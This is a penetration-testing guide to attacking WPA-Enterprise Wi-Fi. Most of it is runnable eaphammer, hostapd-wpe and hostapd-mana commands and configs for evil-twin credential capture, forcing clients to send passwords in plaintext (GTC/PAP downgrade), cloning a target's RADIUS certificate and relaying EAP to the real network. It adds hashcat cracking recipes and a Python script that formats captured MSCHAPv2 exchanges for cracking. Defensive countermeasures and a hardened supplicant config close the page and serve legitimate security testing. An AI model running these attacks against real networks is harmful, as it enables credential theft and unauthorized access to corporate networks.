WPA-Enterprise Attacks
WPA-Enterprise (WPA2/WPA3-Enterprise) authenticates clients with IEEE 802.1X: the access point relays EAP between the client's supplicant and a RADIUS server. Common EAP types are PEAP, EAP-TLS and EAP-TTLS. The attacks on this page either capture the inner credential through a rogue server whose TLS tunnel the client does not validate, or downgrade the inner authentication method so that credential arrives in a weaker form.
Prerequisites
- Wireless adapter in monitor mode (01-Setup Guide)
- hostapd-wpe or eaphammer installed
- Understanding of 802.1X authentication flow and EAP types
- Self-signed certificate for rogue AP (generated by tools automatically)
- Test environment with WPA-Enterprise RADIUS server (FreeRADIUS recommended)
EAP Type Overview
| EAP Type | Inner Auth | Cert Required | Attack Surface | Difficulty |
|---|---|---|---|---|
| PEAP-MSCHAPv2 | MSCHAPv2 | Server only | High: challenge/response capturable if the server cert is not validated, then cracked offline | Easy |
| EAP-TTLS/PAP | PAP (plaintext) | Server only | Critical: plaintext password inside the tunnel, readable by whoever terminates the TLS | Easy |
| EAP-TTLS/MSCHAPv2 | MSCHAPv2 | Server only | High: same as PEAP | Easy |
| EAP-TLS | Certificate | Both (mutual) | Low: requires theft of a client certificate and key | Hard |
| EAP-GTC | Token/OTP | Server only | Medium: token or static password captured in plaintext | Medium |
| EAP-FAST | PAC (Cisco) | Optional | Medium: anonymous in-band PAC provisioning is vulnerable to a rogue server | Medium |
Credential Capture (hostapd-wpe)
Attack Vectors
- Evil Twin with hostapd-wpe: a rogue AP broadcasting the target SSID with its own EAP server; clients that connect send their inner authentication to the attacker, yielding MSCHAPv2 challenge/responses (or plaintext for GTC and PAP).
- Certificate Impersonation: many supplicants do not validate the server certificate, either because no CA or server name was configured or because the user clicks through a trust prompt. hostapd-wpe and eaphammer generate self-signed certificates, optionally with subject fields copied from the real server.
- EAP Downgrade: the rogue server offers a weaker inner method (GTC or PAP) so the credential arrives in plaintext instead of as an MSCHAPv2 response.
- Offline Dictionary Attack: captured MSCHAPv2 challenge/responses are cracked offline with hashcat mode 5500.
Eaphammer Advanced Usage
Eaphammer (built on a patched hostapd) automates rogue AP setup, certificate generation, credential capture, and EAP downgrade attacks, and is the most convenient tool for the capture and downgrade attacks described above.
Install:

```bash
git clone https://github.com/s0lst1c3/eaphammer
cd eaphammer
./kali-setup
```

Generate certificates mimicking the target organization:

```bash
# Creates a CA + server cert chain that looks like the target's RADIUS certificate
./eaphammer --cert-wizard
# When prompted:
# Country: US
# State: California
# Locality: San Francisco
# Organization: Target Corp IT    (match the target's cert if known)
# Email: admin@targetcorp.com
# CN: radius.targetcorp.com       (match the target's CN exactly)
```

Run the attacks. `--auth wpa-eap` selects WPA-Enterprise; eaphammer's credential capture terminates the TLS tunnel in its own EAP server, which is why it sees the inner authentication:

```bash
# Basic credential capture, the most common attack
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --auth wpa-eap --creds
# Capture with hostile portal (phishing page after connection)
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --captive-portal
# GTC downgrade: offer GTC as the inner method so clients send plaintext credentials
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --auth wpa-eap --creds --negotiate gtc-downgrade
# GTC downgrade combined with the known-beacon attack (answers probes for remembered SSIDs);
# deauthenticate clients from the real AP separately, e.g. with aireplay-ng on a second
# monitor-mode interface such as wlan1mon, so they roam to the rogue AP
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --auth wpa-eap --creds \
  --negotiate gtc-downgrade --known-beacons
```

EAP Downgrade Attacks
EAP downgrade attacks exploit the method negotiation. The rogue server proposes a weaker inner method than the one the real network uses; a supplicant with no pinned inner method (the default for manually configured clients) accepts it and sends the credential in a more exploitable form: a GTC or PAP exchange carries the plaintext password, where MSCHAPv2 would only have yielded a challenge/response to crack.
GTC Downgrade = Plaintext Credentials
GTC Downgrade with hostapd-wpe
```bash
# Edit the EAP user file referenced by eap_user_file= in hostapd-wpe.conf
# (/etc/hostapd-wpe/hostapd-wpe.eap_user on Kali) so that GTC is offered first:
#
# Phase 1: accept any outer method the client proposes
*       PEAP,TTLS
# Phase 2: the wildcard identity "t" matches every inner user. Methods are
# offered in the listed order, so GTC is proposed first and MSCHAPv2 only if
# the client NAKs it
"t"     GTC,MSCHAPV2    "t"     [2]

# Run the attack
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
# Output on a successful GTC capture (illustrative):
# EAP-GTC: Username: john.smith
# EAP-GTC: Password: Summer2025!
```

EAP-TTLS/PAP Downgrade
Similar to GTC: if the client accepts EAP-TTLS as the outer method, the inner authentication can be switched to PAP, which sends the password in cleartext inside the TLS tunnel, and that tunnel terminates at your rogue RADIUS server.
```bash
# Eaphammer: TTLS/PAP downgrade. Select the methods explicitly: outer TTLS
# (PEAP as fallback), inner PAP first, then GTC and MSCHAPv2 if the client refuses
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --auth wpa-eap --creds \
  --negotiate manual --phase-1-methods TTLS,PEAP --phase-2-methods PAP,GTC,MSCHAPV2
# Captured output (illustrative):
# EAP-TTLS/PAP: Username: admin@corp
# EAP-TTLS/PAP: Password: P@ssw0rd123
```

Identifying Downgrade Vulnerability
Before attacking, determine whether the target's supplicant accepts a weaker inner method than the one it was configured with. A profile that pins both the inner method and the server certificate blocks the downgrade on every platform; the table describes the behaviour of manually configured clients:
| OS / Supplicant | GTC Vulnerable | PAP Vulnerable | Notes |
|---|---|---|---|
| Windows (NativeSup) | No | No | Only accepts configured inner method |
| macOS / iOS | Yes | No | Accepts GTC if user clicks "Trust" |
| Android (wpa_supplicant) | Yes | Yes | Highly variable by manufacturer & version |
| Linux (NetworkManager) | Yes | Yes | Depends on supplicant config |
| ChromeOS | No | No | Enforces configured EAP method |
Certificate Impersonation
WPA-Enterprise relies on the client trusting the RADIUS server's certificate. Most enterprise deployments never provision the RADIUS CA and expected server name to supplicants, so either the client accepts any certificate or it shows a trust prompt and the user clicks "Trust".
Reconnaissance β Extract Target Certificate
```bash
# Step 1: connect a test device configured for the enterprise SSID and capture the
# EAP-TLS handshake; the server certificate travels in the clear inside EAP frames
tshark -r enterprise-capture.pcap -Y "eap && tls.handshake.certificate" \
  -T fields -e tls.handshake.certificate 2>/dev/null
# (the field is printed as hex-encoded DER; decode it to radius-cert.pem for step 2)
# Or, if the RADIUS server exposes RadSec (RADIUS over TLS, port 2083), pull the cert directly
openssl s_client -connect radius.corp.com:2083 -showcerts < /dev/null 2>/dev/null
# Step 2: extract the details to clone
openssl x509 -in radius-cert.pem -noout -subject -issuer -dates
# subject=CN = radius.targetcorp.com
# issuer=CN = TargetCorp Root CA
# notBefore=Jan 1 00:00:00 2024 GMT
# notAfter=Dec 31 23:59:59 2026 GMT
```

Clone & Deploy Impersonated Certificate
```bash
# Generate a matching cert chain with eaphammer
./eaphammer --cert-wizard
# Or manually with OpenSSL:
# 1. Create a fake root CA whose subject matches the target's issuer DN
openssl req -x509 -newkey rsa:2048 -keyout fakeCA.key -out fakeCA.pem \
  -days 365 -nodes -subj "/CN=TargetCorp Root CA/O=TargetCorp"
# 2. Create the server cert, signed by the fake CA, with the target's subject DN
openssl req -newkey rsa:2048 -keyout server.key -out server.csr \
  -nodes -subj "/CN=radius.targetcorp.com/O=TargetCorp IT"
openssl x509 -req -in server.csr -CA fakeCA.pem -CAkey fakeCA.key \
  -CAcreateserial -out server.pem -days 365
# 3. Deploy with hostapd-wpe: point hostapd-wpe.conf at the new files
# ca_cert=/path/to/fakeCA.pem
# server_cert=/path/to/server.pem
# private_key=/path/to/server.key
#
# A client that has the real CA provisioned still rejects this chain (the
# signature is not from the real CA); cloning only helps against clients that
# accept any certificate or leave the decision to the user.
```
RADIUS Relay & EAP Relay
EAP relay attacks bypass credential cracking entirely. Instead of capturing a challenge/response and cracking it, the attacker relays the live authentication between the victim's client and the real network: the victim performs the authentication, and the attacker ends up holding the resulting session without ever learning the password.
Most Dangerous Enterprise Attack
Attack Architecture
```
# EAP relay attack flow:
#
#   [Victim Client] --WiFi--> [Rogue AP (attacker)] --wire/VPN, or a 2nd WiFi iface--> [Real RADIUS / real AP]
#                                       |
#                     relays the EAP conversation in both directions
#                                       |
#                     attacker ends up with a valid session:
#                       - forwarding to the real RADIUS server as a NAS (needs the shared secret):
#                         the victim's session keys, i.e. a transparent MITM of the victim's traffic
#                       - forwarding to the real AP as a supplicant (hostapd-mana + wpa_sycophant):
#                         a session on the real network as the victim
#
# Requirements:
# 1. Rogue AP on same SSID as target
# 2. A path to the real authentication: the RADIUS server reachable plus its shared secret,
#    or the real AP in range of a second interface
# 3. Client that doesn't validate server certificates (the TLS tunnel must terminate on the rogue AP)
# 4. hostapd-mana configured for relay (with wpa_sycophant for the wireless variant)
```

EAP Relay with hostapd-mana
```bash
# Install hostapd-mana (sensepost fork; its companion wpa_sycophant provides the wireless EAP relay)
git clone https://github.com/sensepost/hostapd-mana
cd hostapd-mana
make
```

```
# hostapd-mana.conf: rogue AP that forwards EAP to the real RADIUS server
interface=wlan0
ssid=CorpWiFi
channel=6
wpa=2
wpa_key_mgmt=WPA-EAP
ieee8021x=1
# mana credential logging; only effective with hostapd's built-in EAP server
# (eap_server=1). With an external RADIUS server the TLS tunnel terminates at
# the real server, so the inner credentials are never visible here
mana_wpe=1
mana_eapsuccess=1
mana_credout=/tmp/creds.txt
# Forward EAP to the real RADIUS server. This needs the NAS shared secret;
# testing123 is FreeRADIUS's well-known default and a common finding
auth_server_addr=10.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
```

```bash
# Launch (the built binary is hostapd/hostapd; the Kali package installs it as hostapd-mana)
sudo ./hostapd/hostapd hostapd-mana.conf
```

EAPHammer Relay Mode
eaphammer has no relay mode: its `--creds` attack terminates the EAP conversation in its own EAP server (that is how it sees the credentials), and it has no option for forwarding to an external RADIUS server. Use hostapd-mana (with wpa_sycophant for the wireless variant) for relay, and eaphammer for capture and downgrade.

Cracking MSCHAP Hashes
Captured MSCHAPv2 challenge/responses are cracked with hashcat mode 5500 (NetNTLMv1). The tools print them as `username::::response:challenge`, where `response` is the 24-byte NT-Response and `challenge` is the 8-byte value derived from the peer and authenticator challenges (RFC 2759 ChallengeHash); the domain and LM-response fields are left empty.
```bash
# Basic dictionary attack
hashcat -m 5500 hashes.txt /usr/share/wordlists/rockyou.txt
# With rules for better coverage
hashcat -m 5500 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Enterprise passwords are often stronger: use targeted masks,
# e.g. company name + four digits + one special character
hashcat -m 5500 hashes.txt -a 3 'CorpName?d?d?d?d?s'
# Last resort, independent of password strength: the NT-Response is three DES
# encryptions of the 8-byte challenge under keys derived from the NT hash, so the
# NT hash itself can be recovered by exhaustive DES key search (the chapcrack
# approach; crack.sh offered this as a service). The recovered NT hash is then
# usable directly, e.g. for pass-the-hash, without ever knowing the password.
```
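The hashcat line is normally printed by hostapd-wpe or eaphammer, but when all you have is a pcap it helps to know how it is built. The following is an added example (not code from hostapd-wpe, eaphammer or hashcat): it splits the 49-byte Response field of an EAP-MSCHAPv2 Response packet into peer challenge and NT-Response, computes the 8-byte challenge with RFC 2759's ChallengeHash, strips a prepended domain from the identity as the RFC requires, and emits the `-m 5500` line. The challenge-hash inputs and expected output are the RFC 2759 section 9.2 test vectors; the 24-byte NT-Response is a constructed placeholder, not the RFC's value.

```python
"""Turn a captured EAP-MSCHAPv2 exchange into a hashcat -m 5500 line.

Added example for this page; not code from hostapd-wpe, eaphammer or hashcat.
The challenge-hash vectors are RFC 2759 section 9.2 (user "User", password
"clientPass"); the 24-byte NT-Response used below is a constructed placeholder.
"""
import hashlib

# Response field of an EAP-MSCHAPv2 Response packet (49 bytes):
#   Peer-Challenge (16) | Reserved (8, zero) | NT-Response (24) | Flags (1)
PEER_CHALLENGE_LEN, RESERVED_LEN, NT_RESPONSE_LEN, FLAGS_LEN = 16, 8, 24, 1
RESPONSE_FIELD_LEN = PEER_CHALLENGE_LEN + RESERVED_LEN + NT_RESPONSE_LEN + FLAGS_LEN

# RFC 2759 section 9.2 test vectors.
RFC2759_USER = "User"
RFC2759_AUTH_CHALLENGE = bytes.fromhex("5b5d7c7d7b3f2f3e3c2c602132262628")
RFC2759_PEER_CHALLENGE = bytes.fromhex("21402324255e262a28295f2b3a337c7e")
RFC2759_CHALLENGE = bytes.fromhex("d02e4386bce91226")   # expected ChallengeHash output


def strip_domain(identity: str) -> str:
    """RFC 2759 hashes the user name 'excluding any prepended domain name':
    'CORP\\john.smith' -> 'john.smith'. An '@realm' suffix is left alone."""
    return identity.rsplit("\\", 1)[-1]


def challenge_hash(peer_challenge: bytes, authenticator_challenge: bytes, username: str) -> bytes:
    """RFC 2759 ChallengeHash(): the first 8 bytes of
    SHA-1(PeerChallenge || AuthenticatorChallenge || UserName).
    This 8-byte value is what the NT hash is DES-encrypted against, so it is
    the 'challenge' a NetNTLMv1 cracker (hashcat 5500) needs."""
    if len(peer_challenge) != 16 or len(authenticator_challenge) != 16:
        raise ValueError("MSCHAPv2 challenges are 16 bytes each")
    h = hashlib.sha1()
    h.update(peer_challenge)
    h.update(authenticator_challenge)
    h.update(username.encode("utf-8"))
    return h.digest()[:8]


def split_response_field(field: bytes):
    """Split the 49-byte Response field into (peer_challenge, nt_response)."""
    if len(field) != RESPONSE_FIELD_LEN:
        raise ValueError(f"expected {RESPONSE_FIELD_LEN}-byte response field, got {len(field)}")
    peer = field[:PEER_CHALLENGE_LEN]
    start = PEER_CHALLENGE_LEN + RESERVED_LEN
    return peer, field[start:start + NT_RESPONSE_LEN]


def to_hashcat_5500(identity: str, authenticator_challenge: bytes, response_field: bytes) -> str:
    """hashcat -m 5500 line, user::domain:lmresp:ntresp:challenge, with the
    domain and LM-response fields empty, the same layout hostapd-wpe prints."""
    user = strip_domain(identity)
    peer, nt_response = split_response_field(response_field)
    chal = challenge_hash(peer, authenticator_challenge, user)
    return f"{user}::::{nt_response.hex()}:{chal.hex()}"


def sample_response_field() -> bytes:
    """Constructed Response field: the RFC 2759 peer challenge, zero reserved
    bytes, a placeholder NT-Response (bytes 0x10..0x27) and a zero Flags byte."""
    nt_response = bytes(range(0x10, 0x10 + NT_RESPONSE_LEN))
    return RFC2759_PEER_CHALLENGE + bytes(RESERVED_LEN) + nt_response + b"\x00"


if __name__ == "__main__":
    # The authenticator challenge comes from the server's Challenge packet,
    # the Response field from the client's Response packet, the identity from
    # the EAP-Response/Identity (or the Name field of the MSCHAPv2 response).
    print(to_hashcat_5500("CORP\\" + RFC2759_USER, RFC2759_AUTH_CHALLENGE, sample_response_field()))
```

Two details matter when reproducing this from a capture: the user name fed to ChallengeHash must be the one the client actually used (the MSCHAPv2 Name field, which may differ from the outer EAP identity), and the domain prefix is stripped only for the hash input, not when naming the account in your report.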
Defensive Countermeasures
| Defense | Prevents | Implementation |
|---|---|---|
| Provision RADIUS CA and server name via MDM | Evil twin, cert impersonation | Push the RADIUS CA and expected server name in a Wi-Fi profile (Intune, Jamf, Workspace ONE, GPO) so the user never sees a trust prompt |
| EAP-TLS (mutual cert) | All password capture, downgrade, relay | Issue client certs via PKI; strongest protection |
| Server name constraint | Cert impersonation | Configure the supplicant to require the expected CN/SAN (wpa_supplicant `domain_match`, Windows "Connect to these servers") |
| RADIUS MAC binding | Relay attacks (partially) | Verify Calling-Station-Id against registered device MACs; a relay can spoof the victim's MAC, so treat this as defense in depth |
| Lock inner EAP method | GTC/PAP downgrade | GPO/MDM profile that pins PEAP-MSCHAPv2 (or TTLS/MSCHAPv2) and rejects other inner methods |
| WIDS/WIPS | Rogue AP detection | Cisco CleanAir, Aruba WIDS, Kismet alerting on unknown BSSIDs advertising the corporate SSID |
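The three supplicant-side rows (CA provisioning, server name constraint, locked inner method) map onto concrete wpa_supplicant settings. The following is an added example, not configuration from the page's tools or from any vendor profile; the SSID, account, file paths and RADIUS host name are assumptions.

```conf
# wpa_supplicant.conf (added example; names and paths are assumptions)

# Weak: what a manually configured client typically ends up with. No CA, no
# server name, no pinned inner method. The client accepts a hostapd-wpe
# certificate, and a rogue server can negotiate GTC or PAP for the inner method.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="john.smith"
    password="Summer2025!"
}

# Hardened: trust only the corporate RADIUS CA, require the expected server
# name, and fix both the outer and the inner method so a rogue server's offer
# of TTLS, GTC or PAP is NAKed instead of accepted.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP                                   # outer method pinned: TTLS offers are refused
    identity="john.smith"
    anonymous_identity="anonymous@targetcorp.com"  # outer identity: keeps the real user name inside the tunnel
    password="Summer2025!"
    ca_cert="/etc/ssl/certs/targetcorp-radius-ca.pem"  # chain must end at this CA; a cloned chain fails here
    domain_match="radius.targetcorp.com"       # exact match on the server cert's SAN/CN
    phase2="auth=MSCHAPV2"                     # inner method pinned: GTC/PAP downgrade is refused
}
```

`domain_suffix_match="targetcorp.com"` is the looser alternative when several RADIUS servers share a suffix; `altsubject_match` can pin a full SAN entry. The same three controls exist in Windows (trusted root CA, "Connect to these servers", and the configured authentication method) and in Apple and Android profiles pushed by MDM.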